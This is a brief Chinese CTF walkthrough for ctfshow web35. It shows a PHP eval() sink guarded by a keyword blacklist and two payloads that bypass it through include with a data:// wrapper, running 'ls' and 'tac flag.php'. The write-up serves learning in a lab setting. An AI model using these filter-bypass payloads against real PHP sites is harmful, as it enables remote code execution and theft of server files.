[ctfshow web入门] web35
信息收集
这一题多了尖括号<
=
的过滤,这也没啥影响
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
解题
参考[ctfshow web入门] web31
使用最简单的解法,具体描述参考web31,不再赘述
?c=include$_GET[1]?>&1=data://text/plain,<?php system("ls") ?>
?c=include$_GET[1]?>&1=data://text/plain,<?php system("tac flag.php") ?>
web34 目录 web36